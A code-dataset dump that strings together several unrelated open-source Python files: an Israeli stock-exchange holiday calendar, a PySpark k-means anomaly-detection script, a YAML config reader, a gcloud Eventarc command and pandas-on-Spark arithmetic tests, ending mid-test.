Timestamp('2020-04-08', tz='Asia/Jerusalem'),
Timestamp('2020-04-09', tz='Asia/Jerusalem'),
Timestamp('2020-04-14', tz='Asia/Jerusalem'),
Timestamp('2020-04-15', tz='Asia/Jerusalem'),
Timestamp('2020-04-28', tz='Asia/Jerusalem'),
Timestamp('2020-04-29', tz='Asia/Jerusalem'),
Timestamp('2020-05-28', tz='Asia/Jerusalem'),
Timestamp('2020-05-29', tz='Asia/Jerusalem'),
Timestamp('2020-07-30', tz='Asia/Jerusalem'),
Timestamp('2020-09-20', tz='Asia/Jerusalem'),
Timestamp('2020-09-27', tz='Asia/Jerusalem'),
Timestamp('2020-09-28', tz='Asia/Jerusalem'),
Timestamp('2021-02-26', tz='Asia/Jerusalem'),
Timestamp('2021-03-28', tz='Asia/Jerusalem'),
Timestamp('2021-04-02', tz='Asia/Jerusalem'),
Timestamp('2021-04-14', tz='Asia/Jerusalem'),
Timestamp('2021-04-15', tz='Asia/Jerusalem'),
Timestamp('2021-05-16', tz='Asia/Jerusalem'),
Timestamp('2021-05-17', tz='Asia/Jerusalem'),
Timestamp('2021-07-18', tz='Asia/Jerusalem'),
Timestamp('2021-09-06', tz='Asia/Jerusalem'),
Timestamp('2021-09-07', tz='Asia/Jerusalem'),
Timestamp('2021-09-08', tz='Asia/Jerusalem'),
Timestamp('2021-09-15', tz='Asia/Jerusalem'),
Timestamp('2021-09-16', tz='Asia/Jerusalem'),
Timestamp('2021-09-20', tz='Asia/Jerusalem'),
Timestamp('2021-09-21', tz='Asia/Jerusalem'),
Timestamp('2021-09-27', tz='Asia/Jerusalem'),
Timestamp('2021-09-28', tz='Asia/Jerusalem'),
]
class TASEExchangeCalendar(MarketCalendar):
aliases = ['TASE']
@property
def name(self):
return "TASE"
@property
def tz(self):
return timezone("Asia/Jerusalem")
@property
def open_time_default(self):
return time(10, 0, tzinfo=self.tz)
@property
def close_time_default(self):
return time(15, 59, tzinfo=self.tz)
@property
def adhoc_holidays(self):
return TASEClosedDay
@property
def weekmask(self):
return "Sun Mon Tue Wed Thu"
| true | true |
f7fa3cd349f1ac8a1d4f4540a2bee092f29ec831 | 4,793 | py | Python | sample_ml_code/kmeansandey.py | aws-samples/automation-ml-step-data-pipeline | 835e6e746fd932b32f1a186006adc257778eeec6 | [
"MIT-0"
] | 6 | 2020-10-27T09:07:36.000Z | 2021-12-27T00:25:19.000Z | sample_ml_code/kmeansandey.py | aws-samples/automation-ml-step-data-pipeline | 835e6e746fd932b32f1a186006adc257778eeec6 | [
"MIT-0"
] | null | null | null | sample_ml_code/kmeansandey.py | aws-samples/automation-ml-step-data-pipeline | 835e6e746fd932b32f1a186006adc257778eeec6 | [
"MIT-0"
] | 8 | 2020-10-13T22:23:16.000Z | 2022-02-15T21:29:37.000Z | #!/usr/bin/env python
"""
Anomaly detection, where anomalies are "too far" from one of k cluster centers.
Calculate cluster centers for k clusters (where k is an input).
Then: for each observation in the input file, assign it to the closest cluster
and calculate the Mahalanobis distance from that point to the cluster center.
Output the original observation, plus the additional calculated columns:
assigned_cluster, cluster center, distance
The input (CSV) is expected to be a database extract. Each input row consists of
several columns of identifying information for this obs (cols 0 : first),
followed by several columns of actual observation (cols first : last).
This approach allows anomalies to be traced back to the source data if necessary.
Tested with 3 columns of observational variables.
Uses Spark / Mllib.
Inputs:
infile csv format file, 1 row per observation
k number of clusters to use
outfile directory to place output files in
Output:
CSV file input file + calculated columns
Requires:
pyspark, pyspark.mllib
scipy.spatial
numpy
"""
import sys
import numpy as np
from pyspark import SparkContext, SparkConf
from pyspark.mllib.clustering import KMeans
import scipy.spatial.distance as sci # for Mahalanobis distance calc
# if running pyspark / spark-submit, 'sc' is automatically defined
# sc = SparkContext(appName="KMeans E.G.")
conf = SparkConf().setAppName("KMeans E.G.")
sc = SparkContext(conf=conf)
"""
Dictionary 'incols' relates infile's columns to the data extracted.
Columns [count starts from 0]:
select: highway, sensorstation, sensorid,
yearday, dow, timeofday, volume, speed, occupancy
"""
incols = {'highway' : 0, 'sensorstation': 1, 'sensorid': 2, 'dayofyear': 3, 'dow': 4, 'time': 5, 'vol': 6, 'spd': 7, 'occ': 8 }
sensorset = incols['sensorid']
dow = incols['dow']
# Columns we want to cluster on are: fst:lst
fst = incols['vol']
lst = incols['occ'] + 1
clstrcol = lst # the column for the cluster center TO FIX
idstr = ''
def parse_vector(line):
return np.array([float(x) for x in line.split(',')])
def pt_pred_arr(point):
# Returns the original point and the cluster index that a given point belongs to.
# e.g.: clusters.predict([1,0,1])
cntr = -1
pt = point[fst:lst]
cntrpt = np.zeros_like(pt) # Create "null" array: if there's no center
if np.count_nonzero(pt) > 0:
cntr = clusters.predict(point[fst:lst])
cntrpt = clusters.centers[cntr]
return np.r_[point, [cntr], cntrpt]
if __name__ == "__main__":
if len(sys.argv) != 4:
print >> sys.stderr, "Usage: kmeansande.py <infile> <k> <outfile>"
exit(-1)
infilenm = sys.argv[1] # input file name (in s3)
k = int(sys.argv[2]) # number of clusters to use
outfilenm = sys.argv[3]
# Read the main data file
lines = sc.textFile(infilenm)
alldata = lines.map(parse_vector)
# Only want kmeans run on columns fst:lst
# For weekend only: .filter(lambda arr: np.array(arr[incols['dow']]) == 0
# or np.array(arr[incols['dow']] == 6))
datasub = alldata.map(lambda arr: np.array(arr[fst:lst])) \
.filter(lambda x: np.count_nonzero(x) > 0)
clusters = KMeans.train(datasub, k)
# For each point: figure out the closest cluster center
# Add each cluster center as additional columns to the original input
closestcenter = alldata.map(lambda cc: pt_pred_arr(cc))
# For M.distance calc: need inverted covariance matrix as part of inputs.
# So: For each cluster 'c', calculate the covariance matrix.
inv_covmat = []
for c in range(0, k):
# Get the actual data columns (subset of the whole line)
data = closestcenter.filter(lambda arr: np.array(arr[clstrcol]) == c) \
.map(lambda arr: np.array(arr[fst:lst]))
# Calc the covariance matrix, and invert
# Convert from RDD to list, so numpy stats will run against it
# OR - could write a function to calc the covariance matrix against this RDD ...
datacol = data.collect()
dtcnt = len(datacol)
if dtcnt == 0:
print "Error? - No data for cluster #" + str(c) + ".\n"
iterate
covmat = np.cov(datacol,None,0) # Get covariance matrix
inv_covmat.append( np.linalg.inv(covmat)) # Invert
# Calc the Malhanobis distance for each point and append to row
dists = closestcenter.map(lambda dst:
','.join(['%.2f' % num for num in
(np.r_[dst, sci.mahalanobis(dst[fst:lst],
clusters.centers[int(dst[clstrcol])],
inv_covmat[int(dst[clstrcol])])])]))
dists.saveAsTextFile(outfilenm) # output resulting file
sc.stop()
| 39.61157 | 127 | 0.66305 |
"""
Anomaly detection, where anomalies are "too far" from one of k cluster centers.
Calculate cluster centers for k clusters (where k is an input).
Then: for each observation in the input file, assign it to the closest cluster
and calculate the Mahalanobis distance from that point to the cluster center.
Output the original observation, plus the additional calculated columns:
assigned_cluster, cluster center, distance
The input (CSV) is expected to be a database extract. Each input row consists of
several columns of identifying information for this obs (cols 0 : first),
followed by several columns of actual observation (cols first : last).
This approach allows anomalies to be traced back to the source data if necessary.
Tested with 3 columns of observational variables.
Uses Spark / Mllib.
Inputs:
infile csv format file, 1 row per observation
k number of clusters to use
outfile directory to place output files in
Output:
CSV file input file + calculated columns
Requires:
pyspark, pyspark.mllib
scipy.spatial
numpy
"""
import sys
import numpy as np
from pyspark import SparkContext, SparkConf
from pyspark.mllib.clustering import KMeans
import scipy.spatial.distance as sci
conf = SparkConf().setAppName("KMeans E.G.")
sc = SparkContext(conf=conf)
"""
Dictionary 'incols' relates infile's columns to the data extracted.
Columns [count starts from 0]:
select: highway, sensorstation, sensorid,
yearday, dow, timeofday, volume, speed, occupancy
"""
incols = {'highway' : 0, 'sensorstation': 1, 'sensorid': 2, 'dayofyear': 3, 'dow': 4, 'time': 5, 'vol': 6, 'spd': 7, 'occ': 8 }
sensorset = incols['sensorid']
dow = incols['dow']
# Columns we want to cluster on are: fst:lst
fst = incols['vol']
lst = incols['occ'] + 1
clstrcol = lst # the column for the cluster center TO FIX
idstr = ''
def parse_vector(line):
return np.array([float(x) for x in line.split(',')])
def pt_pred_arr(point):
# Returns the original point and the cluster index that a given point belongs to.
# e.g.: clusters.predict([1,0,1])
cntr = -1
pt = point[fst:lst]
cntrpt = np.zeros_like(pt) # Create "null" array: if there's no center
if np.count_nonzero(pt) > 0:
cntr = clusters.predict(point[fst:lst])
cntrpt = clusters.centers[cntr]
return np.r_[point, [cntr], cntrpt]
if __name__ == "__main__":
if len(sys.argv) != 4:
print >> sys.stderr, "Usage: kmeansande.py <infile> <k> <outfile>"
exit(-1)
infilenm = sys.argv[1]
k = int(sys.argv[2])
outfilenm = sys.argv[3]
lines = sc.textFile(infilenm)
alldata = lines.map(parse_vector)
datasub = alldata.map(lambda arr: np.array(arr[fst:lst])) \
.filter(lambda x: np.count_nonzero(x) > 0)
clusters = KMeans.train(datasub, k)
closestcenter = alldata.map(lambda cc: pt_pred_arr(cc))
inv_covmat = []
for c in range(0, k):
data = closestcenter.filter(lambda arr: np.array(arr[clstrcol]) == c) \
.map(lambda arr: np.array(arr[fst:lst]))
datacol = data.collect()
dtcnt = len(datacol)
if dtcnt == 0:
print "Error? - No data for cluster #" + str(c) + ".\n"
iterate
covmat = np.cov(datacol,None,0)
inv_covmat.append( np.linalg.inv(covmat))
dists = closestcenter.map(lambda dst:
','.join(['%.2f' % num for num in
(np.r_[dst, sci.mahalanobis(dst[fst:lst],
clusters.centers[int(dst[clstrcol])],
inv_covmat[int(dst[clstrcol])])])]))
dists.saveAsTextFile(outfilenm)
sc.stop()
| false | true |
f7fa3d230e37b5992cf1b5209c6bf723230cb81d | 1,018 | py | Python | src/Install/private.py | DBrianKimmel/PyHouse_Install | 9c7ff397299e0f2e63782d4a955d2f8bf840ef6f | [
"MIT"
] | 1 | 2015-10-13T15:01:48.000Z | 2015-10-13T15:01:48.000Z | src/Install/private.py | DBrianKimmel/PyHouse_Install | 9c7ff397299e0f2e63782d4a955d2f8bf840ef6f | [
"MIT"
] | null | null | null | src/Install/private.py | DBrianKimmel/PyHouse_Install | 9c7ff397299e0f2e63782d4a955d2f8bf840ef6f | [
"MIT"
] | null | null | null | """
@name: PyHouse_Install/src/Install/private.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2016-2016 by D. Brian Kimmel
@license: MIT License
@note: Created May 13, 2016
@Summary: Create .private
Create the /etc/pyhouse/.private.yaml file that will hold the secret information used by the pyhouse system.
HOSTNAME: hostname
MQTT: true
NODE_RED: false
"""
import yaml
Y_FILE = '/etc/pyhouse/.private.yaml'
class Private(object):
def __init__(self):
self.hostname = None
class API(object):
"""
"""
def __init__(self):
self.m_private = Private()
self.read_yaml()
def read_yaml(self):
l_file = open(Y_FILE)
# use safe_load instead load
self.m_private = yaml.safe_load(l_file)
l_file.close()
def write_yaml(self):
l_file = open('newtree.yaml', "w")
yaml.dump(self.m_private, l_file)
l_file.close()
if __name__ == '__main--':
API()
# ## END DBK
| 19.207547 | 108 | 0.633595 |
import yaml
Y_FILE = '/etc/pyhouse/.private.yaml'
class Private(object):
def __init__(self):
self.hostname = None
class API(object):
def __init__(self):
self.m_private = Private()
self.read_yaml()
def read_yaml(self):
l_file = open(Y_FILE)
self.m_private = yaml.safe_load(l_file)
l_file.close()
def write_yaml(self):
l_file = open('newtree.yaml', "w")
yaml.dump(self.m_private, l_file)
l_file.close()
if __name__ == '__main--':
API()
| true | true |
f7fa3ddc6f0ec4da6918d148a7a91e09eb47a328 | 2,000 | py | Python | lib/surface/eventarc/channel_connections/list.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/surface/eventarc/channel_connections/list.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/surface/eventarc/channel_connections/list.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command to list all channel connections in a project and location."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.eventarc import channel_connections
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.eventarc import flags
_DETAILED_HELP = {
"DESCRIPTION":
"{description}",
"EXAMPLES":
"""\
To list all channel connections in location ``us-central1'', run:
$ {command} --location=us-central1
""",
}
_FORMAT = """\
table(
name.scope("channelConnections"):label=NAME,
channel:label=CHANNEL
)
"""
@base.Hidden
@base.ReleaseTracks(base.ReleaseTrack.GA)
class List(base.ListCommand):
"""List Eventarc channel connections."""
detailed_help = _DETAILED_HELP
@staticmethod
def Args(parser):
flags.AddLocationResourceArg(
parser,
"Location for which to list channel connections. This should be one of the supported regions.",
required=True)
parser.display_info.AddFormat(_FORMAT)
parser.display_info.AddUriFunc(channel_connections.GetChannelConnectionsURI)
def Run(self, args):
client = channel_connections.ChannelConnectionClientV1()
location_ref = args.CONCEPTS.location.Parse()
return client.List(location_ref, args.limit, args.page_size)
| 31.25 | 103 | 0.7375 |
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.eventarc import channel_connections
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.eventarc import flags
_DETAILED_HELP = {
"DESCRIPTION":
"{description}",
"EXAMPLES":
"""\
To list all channel connections in location ``us-central1'', run:
$ {command} --location=us-central1
""",
}
_FORMAT = """\
table(
name.scope("channelConnections"):label=NAME,
channel:label=CHANNEL
)
"""
@base.Hidden
@base.ReleaseTracks(base.ReleaseTrack.GA)
class List(base.ListCommand):
detailed_help = _DETAILED_HELP
@staticmethod
def Args(parser):
flags.AddLocationResourceArg(
parser,
"Location for which to list channel connections. This should be one of the supported regions.",
required=True)
parser.display_info.AddFormat(_FORMAT)
parser.display_info.AddUriFunc(channel_connections.GetChannelConnectionsURI)
def Run(self, args):
client = channel_connections.ChannelConnectionClientV1()
location_ref = args.CONCEPTS.location.Parse()
return client.List(location_ref, args.limit, args.page_size)
| true | true |
f7fa3e113624a8b4cb37438fb0d9c9ef30af3f3b | 72 | py | Python | omb/backend/__init__.py | lhqing/omb | 3476a6c377dbac621e6328004d6fd73f7b7c4fbb | [
"MIT"
] | 4 | 2020-08-28T01:00:09.000Z | 2022-03-25T23:00:47.000Z | omb/backend/__init__.py | lhqing/omb | 3476a6c377dbac621e6328004d6fd73f7b7c4fbb | [
"MIT"
] | 2 | 2020-11-08T23:55:08.000Z | 2020-12-24T06:05:17.000Z | omb/backend/__init__.py | lhqing/omb | 3476a6c377dbac621e6328004d6fd73f7b7c4fbb | [
"MIT"
] | null | null | null | from .Dataset import Dataset
from .ingest import *
dataset = Dataset()
| 14.4 | 28 | 0.75 | from .Dataset import Dataset
from .ingest import *
dataset = Dataset()
| true | true |
f7fa3e876f5f1fdd3fd9a03bbcae2a10d57ea60b | 76,636 | py | Python | python/pyspark/pandas/tests/test_ops_on_diff_frames.py | geosmart/spark | 9c5bcac61ee56fbb271e890cc33f9a983612c5b0 | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2016-06-03T07:29:48.000Z | 2016-06-03T07:29:48.000Z | python/pyspark/pandas/tests/test_ops_on_diff_frames.py | geosmart/spark | 9c5bcac61ee56fbb271e890cc33f9a983612c5b0 | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | python/pyspark/pandas/tests/test_ops_on_diff_frames.py | geosmart/spark | 9c5bcac61ee56fbb271e890cc33f9a983612c5b0 | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2016-03-31T11:26:36.000Z | 2016-03-31T11:26:36.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.version import LooseVersion
from itertools import product
import unittest
import pandas as pd
import numpy as np
from pyspark import pandas as ps
from pyspark.pandas.config import set_option, reset_option
from pyspark.pandas.frame import DataFrame
from pyspark.testing.pandasutils import PandasOnSparkTestCase
from pyspark.testing.sqlutils import SQLTestUtils
from pyspark.pandas.typedef.typehints import (
extension_dtypes,
extension_dtypes_available,
extension_float_dtypes_available,
extension_object_dtypes_available,
)
class OpsOnDiffFramesEnabledTest(PandasOnSparkTestCase, SQLTestUtils):
@classmethod
def setUpClass(cls):
super().setUpClass()
set_option("compute.ops_on_diff_frames", True)
@classmethod
def tearDownClass(cls):
reset_option("compute.ops_on_diff_frames")
super().tearDownClass()
@property
def pdf1(self):
return pd.DataFrame(
{"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
)
@property
def pdf2(self):
return pd.DataFrame(
{"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
index=list(range(9)),
)
@property
def pdf3(self):
return pd.DataFrame(
{"b": [1, 1, 1, 1, 1, 1, 1, 1, 1], "c": [1, 1, 1, 1, 1, 1, 1, 1, 1]},
index=list(range(9)),
)
@property
def pdf4(self):
return pd.DataFrame(
{"e": [2, 2, 2, 2, 2, 2, 2, 2, 2], "f": [2, 2, 2, 2, 2, 2, 2, 2, 2]},
index=list(range(9)),
)
@property
def pdf5(self):
return pd.DataFrame(
{
"a": [1, 2, 3, 4, 5, 6, 7, 8, 9],
"b": [4, 5, 6, 3, 2, 1, 0, 0, 0],
"c": [4, 5, 6, 3, 2, 1, 0, 0, 0],
},
index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
).set_index(["a", "b"])
@property
def pdf6(self):
return pd.DataFrame(
{
"a": [9, 8, 7, 6, 5, 4, 3, 2, 1],
"b": [0, 0, 0, 4, 5, 6, 1, 2, 3],
"c": [9, 8, 7, 6, 5, 4, 3, 2, 1],
"e": [4, 5, 6, 3, 2, 1, 0, 0, 0],
},
index=list(range(9)),
).set_index(["a", "b"])
@property
def pser1(self):
midx = pd.MultiIndex(
[["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
[[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
)
return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx)
@property
def pser2(self):
midx = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
return pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx)
@property
def pser3(self):
midx = pd.MultiIndex(
[["koalas", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [1, 1, 2, 0, 0, 2, 2, 2, 1]],
)
return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
@property
def psdf1(self):
return ps.from_pandas(self.pdf1)
@property
def psdf2(self):
return ps.from_pandas(self.pdf2)
@property
def psdf3(self):
return ps.from_pandas(self.pdf3)
@property
def psdf4(self):
return ps.from_pandas(self.pdf4)
@property
def psdf5(self):
return ps.from_pandas(self.pdf5)
@property
def psdf6(self):
return ps.from_pandas(self.pdf6)
@property
def psser1(self):
return ps.from_pandas(self.pser1)
@property
def psser2(self):
return ps.from_pandas(self.pser2)
@property
def psser3(self):
return ps.from_pandas(self.pser3)
def test_ranges(self):
self.assert_eq(
(ps.range(10) + ps.range(10)).sort_index(),
(
ps.DataFrame({"id": list(range(10))}) + ps.DataFrame({"id": list(range(10))})
).sort_index(),
)
def test_no_matched_index(self):
with self.assertRaisesRegex(ValueError, "Index names must be exactly matched"):
ps.DataFrame({"a": [1, 2, 3]}).set_index("a") + ps.DataFrame(
{"b": [1, 2, 3]}
).set_index("b")
def test_arithmetic(self):
self._test_arithmetic_frame(self.pdf1, self.pdf2, check_extension=False)
self._test_arithmetic_series(self.pser1, self.pser2, check_extension=False)
@unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
def test_arithmetic_extension_dtypes(self):
self._test_arithmetic_frame(
self.pdf1.astype("Int64"), self.pdf2.astype("Int64"), check_extension=True
)
self._test_arithmetic_series(
self.pser1.astype(int).astype("Int64"),
self.pser2.astype(int).astype("Int64"),
check_extension=True,
)
@unittest.skipIf(
not extension_float_dtypes_available, "pandas extension float dtypes are not available"
)
def test_arithmetic_extension_float_dtypes(self):
self._test_arithmetic_frame(
self.pdf1.astype("Float64"), self.pdf2.astype("Float64"), check_extension=True
)
self._test_arithmetic_series(
self.pser1.astype("Float64"), self.pser2.astype("Float64"), check_extension=True
)
def _test_arithmetic_frame(self, pdf1, pdf2, *, check_extension):
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
if isinstance(actual, DataFrame):
for dtype in actual.dtypes:
self.assertTrue(isinstance(dtype, extension_dtypes))
else:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
# Series
assert_eq((psdf1.a - psdf2.b).sort_index(), (pdf1.a - pdf2.b).sort_index())
assert_eq((psdf1.a * psdf2.a).sort_index(), (pdf1.a * pdf2.a).sort_index())
if check_extension and not extension_float_dtypes_available:
self.assert_eq(
(psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index()
)
else:
assert_eq((psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index())
# DataFrame
assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
# Multi-index columns
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf1.columns = columns
psdf2.columns = columns
pdf1.columns = columns
pdf2.columns = columns
# Series
assert_eq(
(psdf1[("x", "a")] - psdf2[("x", "b")]).sort_index(),
(pdf1[("x", "a")] - pdf2[("x", "b")]).sort_index(),
)
assert_eq(
(psdf1[("x", "a")] - psdf2["x"]["b"]).sort_index(),
(pdf1[("x", "a")] - pdf2["x"]["b"]).sort_index(),
)
assert_eq(
(psdf1["x"]["a"] - psdf2[("x", "b")]).sort_index(),
(pdf1["x"]["a"] - pdf2[("x", "b")]).sort_index(),
)
# DataFrame
assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
def _test_arithmetic_series(self, pser1, pser2, *, check_extension):
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
# MultiIndex Series
assert_eq((psser1 + psser2).sort_index(), (pser1 + pser2).sort_index())
assert_eq((psser1 - psser2).sort_index(), (pser1 - pser2).sort_index())
assert_eq((psser1 * psser2).sort_index(), (pser1 * pser2).sort_index())
if check_extension and not extension_float_dtypes_available:
self.assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
else:
assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
def test_arithmetic_chain(self):
self._test_arithmetic_chain_frame(self.pdf1, self.pdf2, self.pdf3, check_extension=False)
self._test_arithmetic_chain_series(
self.pser1, self.pser2, self.pser3, check_extension=False
)
@unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
def test_arithmetic_chain_extension_dtypes(self):
self._test_arithmetic_chain_frame(
self.pdf1.astype("Int64"),
self.pdf2.astype("Int64"),
self.pdf3.astype("Int64"),
check_extension=True,
)
self._test_arithmetic_chain_series(
self.pser1.astype(int).astype("Int64"),
self.pser2.astype(int).astype("Int64"),
self.pser3.astype(int).astype("Int64"),
check_extension=True,
)
@unittest.skipIf(
not extension_float_dtypes_available, "pandas extension float dtypes are not available"
)
def test_arithmetic_chain_extension_float_dtypes(self):
self._test_arithmetic_chain_frame(
self.pdf1.astype("Float64"),
self.pdf2.astype("Float64"),
self.pdf3.astype("Float64"),
check_extension=True,
)
self._test_arithmetic_chain_series(
self.pser1.astype("Float64"),
self.pser2.astype("Float64"),
self.pser3.astype("Float64"),
check_extension=True,
)
def _test_arithmetic_chain_frame(self, pdf1, pdf2, pdf3, *, check_extension):
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
psdf3 = ps.from_pandas(pdf3)
common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
if isinstance(actual, DataFrame):
for column, dtype in zip(actual.columns, actual.dtypes):
if column in common_columns:
self.assertTrue(isinstance(dtype, extension_dtypes))
else:
self.assertFalse(isinstance(dtype, extension_dtypes))
else:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
# Series
assert_eq(
(psdf1.a - psdf2.b - psdf3.c).sort_index(), (pdf1.a - pdf2.b - pdf3.c).sort_index()
)
assert_eq(
(psdf1.a * (psdf2.a * psdf3.c)).sort_index(), (pdf1.a * (pdf2.a * pdf3.c)).sort_index()
)
if check_extension and not extension_float_dtypes_available:
self.assert_eq(
(psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
(pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
)
else:
assert_eq(
(psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
(pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
)
# DataFrame
if check_extension and (
LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
):
self.assert_eq(
(psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
)
else:
assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
# Multi-index columns
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf1.columns = columns
psdf2.columns = columns
pdf1.columns = columns
pdf2.columns = columns
columns = pd.MultiIndex.from_tuples([("x", "b"), ("y", "c")])
psdf3.columns = columns
pdf3.columns = columns
common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
# Series
assert_eq(
(psdf1[("x", "a")] - psdf2[("x", "b")] - psdf3[("y", "c")]).sort_index(),
(pdf1[("x", "a")] - pdf2[("x", "b")] - pdf3[("y", "c")]).sort_index(),
)
assert_eq(
(psdf1[("x", "a")] * (psdf2[("x", "b")] * psdf3[("y", "c")])).sort_index(),
(pdf1[("x", "a")] * (pdf2[("x", "b")] * pdf3[("y", "c")])).sort_index(),
)
# DataFrame
if check_extension and (
LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
):
self.assert_eq(
(psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
)
else:
assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
def _test_arithmetic_chain_series(self, pser1, pser2, pser3, *, check_extension):
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
psser3 = ps.from_pandas(pser3)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
# MultiIndex Series
assert_eq((psser1 + psser2 - psser3).sort_index(), (pser1 + pser2 - pser3).sort_index())
assert_eq((psser1 * psser2 * psser3).sort_index(), (pser1 * pser2 * pser3).sort_index())
if check_extension and not extension_float_dtypes_available:
if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
self.assert_eq(
(psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index()
)
else:
expected = pd.Series(
